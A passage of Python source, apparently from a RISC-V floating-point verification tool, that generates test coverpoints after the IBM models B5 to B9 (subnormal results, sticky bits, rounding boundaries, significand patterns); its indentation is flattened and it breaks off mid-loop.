b5_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
coverpoints = []
k = 0
for c in b5_comb:
for rm in range(5):
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == '+str(rm)
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += ir_dataset[k][1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B5 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b6(flen, opcode, ops, seed=-1):
'''
IBM Model B6 Definition:
This model tests intermediate results in the space between –MinSubNorm and
+MinSubNorm. For each of the following ranges, we select 8 random test cases,
one for every combination of the LSB, guard bit, and sticky bit.
1. -MinSubNorm < intermediate < -MinSubNorm / 2
2. -MinSubNorm / 2 <= intermediate < 0
3. 0 < intermediate <= +MinSubNorm / 2
4. +MinSubNorm / 2 < intermediate < +MinSubNorm
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Intermediate Results = [Random number ∈ (-MinSubNorm, -MinSubNorm/2), Random number ∈ (-MinSubNorm/2, 0), Random number ∈ (0, +MinSubNorm/2), Random number ∈ (+MinSubNorm/2, +MinSubNorm)]
{All 8 combinations of guard, round and sticky bit are tested for every number}
Operand1 {operation} Operand2 = Intermediate Results
Implementation:
- The intermediate results dataset is populated in accordance with the abstract dataset defined above.
- Intermediate results can be out of the range of what is representable in the specified format; they should only be viewed numerically. Inorder to represent numbers that went out of range of the maximum representable number in python, the “Decimal” module was utilized.
- These operand values are treated as decimal numbers until their derivation after which they are converted into their respective IEEE754 hexadecimal floating point formats using the “floatingPoint_tohex” function.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 40
if seed == -1:
if opcode in 'fmul':
random.seed(0)
elif opcode in 'fdiv':
random.seed(1)
elif opcode in 'fmadd':
random.seed(2)
elif opcode in 'fnmadd':
random.seed(3)
elif opcode in 'fmsub':
random.seed(4)
elif opcode in 'fnmsub':
random.seed(5)
else:
random.seed(seed)
if flen == 32:
ir_dataset = []
ieee754_minsubnorm_n = '-0x0.000001p-127'
minnum = float.fromhex(ieee754_minsubnorm_n)
r=str(random.uniform(minnum,minnum/2))
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-7)))+'e'+r.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (-MinSubNorm, -MinSubNorm / 2)'])
r=str(random.uniform(minnum/2,0))
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-7)))+'e'+r.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (-MinSubNorm / 2, 0)'])
r=str(random.uniform(0,abs(minnum/2)))
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-7)))+'e'+r.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (0, +MinSubNorm / 2)'])
r=str(random.uniform(abs(minnum/2),abs(minnum)))
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-7)))+'e'+r.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (+MinSubNorm / 2, +MinSubNorm)'])
elif flen == 64:
ir_dataset = []
ieee754_minsubnorm_n = '-0x0.0000000000001p-1022'
minnum = float.fromhex(ieee754_minsubnorm_n)
r=str("{:.2e}".format(random.uniform(minnum,minnum/2)))
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-14))),' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (-MinSubNorm, -MinSubNorm / 2)'])
r=str("{:.2e}".format(random.uniform(minnum/2,0)))
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-14))),' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (-MinSubNorm / 2, 0)'])
r=str("{:.2e}".format(random.uniform(0,abs(minnum/2))))
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-14))),' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (0, +MinSubNorm / 2)'])
r=str("{:.2e}".format(random.uniform(abs(minnum/2),abs(minnum))))
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-14))),' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (+MinSubNorm / 2, +MinSubNorm)'])
b6_comb = []
for i in range(len(ir_dataset)):
rs1 = random.uniform(0,1e-30)
rs3 = random.uniform(0,1e-30)
if opcode in 'fmul':
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
elif opcode in 'fdiv':
rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
elif opcode in 'fmadd':
rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmadd':
rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
elif opcode in 'fmsub':
rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmsub':
rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
x3 = struct.unpack('f', struct.pack('f', rs3))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
x3 = rs3
if opcode in ['fmul','fdiv']:
b6_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
b6_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
#print(*b6_comb,sep='\n')
coverpoints = []
k=0
for c in b6_comb:
for rm in range(5):
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == '+str(rm)
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += ir_dataset[k][1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B6 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b7(flen, opcode, ops, seed=-1):
'''
IBM Model B7 Definition:
This model checks that the sticky bit is calculated correctly in each of the following cases (for every possible combination in the table). The Guard bit should always be 0, and the sign positive, so that miscalculation of the sticky bit will alter the final result.
Mask in Extra bits
.. code-block::
1000...000
0100...000
…
0000...010
0000...001
0000000000
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Intermediate Results = [ieee754_maxnorm, maxnum, maxdec, maxnum]
{It assures the calculation of sticky bit for every possible combination in the table}
Operand1 {operation} Operand2 = Intermediate Results
Implementation:
- The Sticky bit is calculated in each case. The guard bit here is always assumed to be zero and the sign is positive, so that miscalculation of the sticky bit will alter the final result.
- In the intermediate result dataset, the elements are appended as elements before the character ‘p’ and then the binary equivalent of ‘010’ + pow(2,i).
- Finally on the extra bits, it is masked with the comment created in the previous point. All the first character of each element is converted to its floating point equivalent in a loop
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 60
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_num = []
for i in fsubnorm+fnorm:
float_val = float.hex(fields_dec_converter(32,i))
if float_val[0] != '-':
ieee754_num.append(float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
ir_dataset = []
for k in range(len(ieee754_num)):
for i in range(0,20):
comment = (20-i)*'0' + '1' + i*'0'
ir_dataset.append([ieee754_num[k].split('p')[0]+hex(int('010'+'{:021b}'.format(pow(2,i)),2))[2:]+'p'+ieee754_num[k].split('p')[1],' | Mask on extra bits ---> ' + comment])
n = len(ir_dataset)
for i in range(n):
ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
elif flen == 64:
maxdec = '1.7976931348623157e+308'
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
ieee754_num = []
for i in dsubnorm+dnorm:
float_val = fields_dec_converter(64,i)
if float_val > 0:
ieee754_num.append(str(float_val))
ir_dataset = []
for l in range(len(ieee754_num)):
for k in range(1,13):
for i in range(4):
comment = (k*(i+1))*'0' + '1' + (51-(k*(i+1)))*'0'
ir_dataset.append([str(Decimal(ieee754_num[l].split('e')[0])+Decimal(pow(16,-14))+Decimal(pow(pow(2,3-i)*16,-14-k)))+'e'+ieee754_num[l].split('e')[1],' | Mask on extra bits ---> ' + comment])
if seed == -1:
if opcode in 'fadd':
random.seed(0)
elif opcode in 'fsub':
random.seed(1)
elif opcode in 'fmul':
random.seed(2)
elif opcode in 'fdiv':
random.seed(3)
elif opcode in 'fsqrt':
random.seed(4)
elif opcode in 'fmadd':
random.seed(5)
elif opcode in 'fnmadd':
random.seed(6)
elif opcode in 'fmsub':
random.seed(7)
elif opcode in 'fnmsub':
random.seed(8)
else:
random.seed(seed)
b7_comb = []
for i in range(len(ir_dataset)):
rs1 = random.uniform(1,maxnum)
rs3 = random.uniform(1,maxnum)
if opcode in 'fadd':
if flen == 32:
rs2 = ir_dataset[i][0] - rs1
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0]) - Decimal(rs1)
elif opcode in 'fsub':
if flen == 32:
rs2 = rs1 - ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(rs1) - Decimal(ir_dataset[i][0])
elif opcode in 'fmul':
if flen == 32:
rs2 = ir_dataset[i][0]/rs1
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
elif opcode in 'fdiv':
if flen == 32:
rs2 = rs1/ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
elif opcode in 'fsqrt':
if flen == 32:
rs2 = ir_dataset[i][0]*ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
elif opcode in 'fmadd':
if flen == 32:
rs2 = (ir_dataset[i][0] - rs3)/rs1
elif flen == 64:
rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmadd':
if flen == 32:
rs2 = (rs3 - ir_dataset[i][0])/rs1
elif flen == 64:
rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
elif opcode in 'fmsub':
if flen == 32:
rs2 = (ir_dataset[i][0] + rs3)/rs1
elif flen == 64:
rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmsub':
if flen == 32:
rs2 = -1*(rs3 + ir_dataset[i][0])/rs1
elif flen == 64:
rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
x3 = struct.unpack('f', struct.pack('f', rs3))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
x3 = rs3
if opcode in ['fadd','fsub','fmul','fdiv']:
b7_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
elif opcode in 'fsqrt':
b7_comb.append((floatingPoint_tohex(flen,float(rs2)),))
elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
b7_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
coverpoints = []
k = 0
for c in b7_comb:
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 3'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += ir_dataset[k][1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B7 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b8(flen, opcode, ops, seed=-1):
'''
IBM Model B8 Definition:
This model targets numbers that are on the edge of a rounding boundary. These boundaries may vary depending on the rounding mode. These numbers include floating-point numbers and midpoints between floating-point numbers. In order to target the vicinity of these numbers, we test the following constraints on the extra bits of the intermediate result:
1. All values of extra-bits in the range [000...00001, 000...00011]
2. All values of extra-bits in the range [111...11100, 111...11111]
For each value selected above, test all the combinations on the LSB of the significand, the guard bit, and the sticky bit (if the number of extra bits is not finite).
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Intermediate Results = [For every Subnormal and Normal number, 8 combinations of guard, round and sticky bit are appended, along with 6 combinations(3 positive, 3 negative) of the mask on extra bits]
Operand1 {operation} Operand2 = Intermediate Results
Implementation:
- The intermediate results dataset is populated in accordance with the abstract dataset defined above. The coverpoints can be increased by increasing the dataset of normal and subnormal numbers.
- Intermediate results can be out of the range of what is representable in the specified format; they should only be viewed numerically. Inorder to represent numbers that went out of range of the maximum representable number in python, the “Decimal” module was utilized.
- These operand values are treated as decimal numbers until their derivation after which they are converted into their respective IEEE754 hexadecimal floating point formats using the “floatingPoint_tohex” function.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 60
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_num = []
for i in fsubnorm+fnorm:
float_val = float.hex(fields_dec_converter(32,i))
if float_val[0] != '-':
ieee754_num.append(float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
ir_dataset = []
# print(*ieee754_num, sep = '\n')
for k in range(len(ieee754_num)):
for i in range(1,4):
for j in range(1,8):
grs = '{:03b}'.format(j)
ir_dataset.append([ieee754_num[k].split('p')[0]+hex(int('{:03b}'.format(j)+19*'0'+'{:02b}'.format(i),2))[2:]+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Mask On Extra Bits: '+19*'0'+'{:02b}'.format(i)])
ir_dataset.append([ieee754_num[k].split('p')[0]+hex(int('{:03b}'.format(j)+19*'1'+'{:02b}'.format(i),2))[2:]+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Mask On Extra Bits: '+19*'1'+'{:02b}'.format(i)])
n = len(ir_dataset)
for i in range(n):
ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
elif flen == 64:
maxdec = '1.7976931348623157e+308'
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
ieee754_num = []
for i in dsubnorm+dnorm:
float_val = float.hex(fields_dec_converter(64,i))
if float_val[0] != '-':
ieee754_num.append(float_val.split('p')[0][0:17]+'p'+float_val.split('p')[1])
ir_dataset = []
for k in range(len(ieee754_num)):
for i in range(1,4):
for j in range(1,8):
grs = '{:03b}'.format(j)
ir_dataset.append([ieee754_num[k].split('p')[0]+hex(int('010'+19*'0'+'{:02b}'.format(i),2))[2:]+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Mask On Extra Bits: '+19*'0'+'{:02b}'.format(i)])
ir_dataset.append([ieee754_num[k].split('p')[0]+hex(int('010'+19*'1'+'{:02b}'.format(i),2))[2:]+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Mask On Extra Bits: '+19*'1'+'{:02b}'.format(i)])
n = len(ir_dataset)
for i in range(n):
ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
if seed == -1:
if opcode in 'fadd':
random.seed(0)
elif opcode in 'fsub':
random.seed(1)
elif opcode in 'fmul':
random.seed(2)
elif opcode in 'fdiv':
random.seed(3)
elif opcode in 'fsqrt':
random.seed(4)
elif opcode in 'fmadd':
random.seed(5)
elif opcode in 'fnmadd':
random.seed(6)
elif opcode in 'fmsub':
random.seed(7)
elif opcode in 'fnmsub':
random.seed(8)
else:
random.seed(seed)
b8_comb = []
for i in range(len(ir_dataset)):
rs1 = random.uniform(1,ir_dataset[i][0])
rs3 = random.uniform(1,ir_dataset[i][0])
if opcode in 'fadd':
if flen == 32:
rs2 = ir_dataset[i][0] - rs1
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0]) - Decimal(rs1)
elif opcode in 'fsub':
if flen == 32:
rs2 = rs1 - ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(rs1) - Decimal(ir_dataset[i][0])
elif opcode in 'fmul':
if flen == 32:
rs2 = ir_dataset[i][0]/rs1
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
elif opcode in 'fdiv':
if flen == 32:
rs2 = rs1/ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
elif opcode in 'fsqrt':
if flen == 32:
rs2 = ir_dataset[i][0]*ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
elif opcode in 'fmadd':
if flen == 32:
rs2 = (ir_dataset[i][0] - rs3)/rs1
elif flen == 64:
rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmadd':
if flen == 32:
rs2 = (rs3 - ir_dataset[i][0])/rs1
elif flen == 64:
rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
elif opcode in 'fmsub':
if flen == 32:
rs2 = (ir_dataset[i][0] + rs3)/rs1
elif flen == 64:
rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmsub':
if flen == 32:
rs2 = -1*(rs3 + ir_dataset[i][0])/rs1
elif flen == 64:
rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
x3 = struct.unpack('f', struct.pack('f', rs3))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
x3 = rs3
if opcode in ['fadd','fsub','fmul','fdiv']:
b8_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
elif opcode in 'fsqrt':
b8_comb.append((floatingPoint_tohex(flen,float(rs2)),))
elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
b8_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
coverpoints = []
k=0
for c in b8_comb:
for rm in range(5):
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == '+str(rm)
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += ir_dataset[k][1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B8 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b9(flen, opcode, ops):
'''
IBM Model B9 Definition:
This model tests special patterns in the significands of the input operands. Each
of the input operands should contain one of the following patterns (each
sequence can be of length 0 up to the number of bits in the significand – the
more interesting cases will be chosen).
1. A sequence of leading zeroes
2. A sequence of leading ones
3. A sequence of trailing zeroes
4. A sequence of trailing ones
5. A small number of 1s as compared to 0s
6. A small number of 0s as compared to 1s
7. A "checkerboard" pattern (for example 00110011... or 011011011...)
8. Long sequences of 1s
9. Long sequences of 0s
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:type flen: int
:type opcode: str
:type ops: int
Abstract Dataset Description:
Operand1, Operand2 ∈ [A sequence of leading zeroes, A sequence of leading ones, A sequence of trailing zeroes, A sequence of trailing ones, A small number of 1s as compared to 0s, A small number of 0s as compared to 1s, A "checkerboard" pattern (for example 00110011... or 011011011...), Long sequences of 1s, Long sequences of 0s]
Implementation:
- The rs1 array is appended with the elements of flip types and then for each iteration, the respective sign, mantissa and exponent is computed.
- A nested loop is initialized, assuming the rs1 mantissa as the base number and rs2 sign and rs2 exponent is obtained directly from the rs1 sign and rs1 exponent. Rs2 mantissa is calculated by adding the iteration number in the beginning of rs1 mantissa. This is done respectively for each repeating pattern.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0]
if flen == 32:
flip_types = fzero + fone + fminsubnorm + fmaxsubnorm + fminnorm + fmaxnorm
e_sz=8
elif flen == 64:
flip_types = dzero + done + dminsubnorm + dmaxsubnorm + dminnorm + dmaxnorm
e_sz=11
rs1 = []
b9_comb = []
comment = []
if ops == 2:
for i in range(len(flip_types)):
rs1.append(flip_types[i])
for i in range(len(rs1)):
bin_val = bin(int('1'+rs1[i][2:],16))[3:]
rs1_sgn = bin_val[0]
rs1_exp = bin_val[1:e_sz+1]
rs1_man = bin_val[e_sz+1:]
for j in range(len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '0'*j + rs1_man[j:] # Leading 0s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(' | Leading zeroes ---> rs2_man = '+rs2_man)
b9_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(' | Leading zeroes ---> rs1_man = '+rs2_man)
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(' | Leading ones ---> rs2_man = '+rs2_man)
b9_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(' | Leading ones ---> rs1_man = '+rs2_man)
rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(' | Trailing zeroes ---> rs2_man = '+rs2_man)
b9_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(' | Trailing zeroes ---> rs1_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(' | Trailing ones ---> rs2_man = '+rs2_man)
b9_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(' | Trailing ones ---> rs1_man = '+rs2_man)
for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(' | Long sequence of ones ---> rs2_man = '+rs2_man)
b9_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(' | Long sequence of ones ---> rs1_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(' | Long sequence of zeroes ---> rs2_man = '+rs2_man)
b9_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(' | Long sequence of zeroes ---> rs1_man = '+rs2_man)
chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
for j in chkrbrd:
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = j
for k in range(math.ceil(len(rs1_man)/len(j))):
rs2_man += j
rs2_man = rs2_man[0:flen-e_sz-1]
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(' | Checkerboard pattern ---> rs2_man = '+rs2_man)
b9_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(' | Checkerboard pattern ---> rs1_man = '+rs2_man)
else:
for i in range(len(flip_types)):
rs1.append(flip_types[i])
for i in range(len(rs1)):
bin_val = bin(int('1'+rs1[i][2:],16))[3:]
rs1_sgn = bin_val[0]
rs1_exp = bin_val[1:e_sz+1]
rs1_man = bin_val[e_sz+1:]
if rs1_sgn != '1':
for j in range(len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '0'*j + rs1_man[j:] # Leading 0s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((floatingPoint_tohex(flen,rs2),))
comment.append(' | Leading zeroes ---> rs1_man = '+rs2_man)
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((floatingPoint_tohex(flen,rs2),))
comment.append(' | Leading ones ---> rs1_man = '+rs2_man)
rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((floatingPoint_tohex(flen,rs2),))
comment.append(' | Trailing zeroes ---> rs1_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((floatingPoint_tohex(flen,rs2),))
comment.append(' | Trailing ones ---> rs1_man = '+rs2_man)
rs1_sgn = '0'
for j in range(flen-e_sz-1-math.ceil(0.1*(flen-e_sz-1)), flen-e_sz-1):
